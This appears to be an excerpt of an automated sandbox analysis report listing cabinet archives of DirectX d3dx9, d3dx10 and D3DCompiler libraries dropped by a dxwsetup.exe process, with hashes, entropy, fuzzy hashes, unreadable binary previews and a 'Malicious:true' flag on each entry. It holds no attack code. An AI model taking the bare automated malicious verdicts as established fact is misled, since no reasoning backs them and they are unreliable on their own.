                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
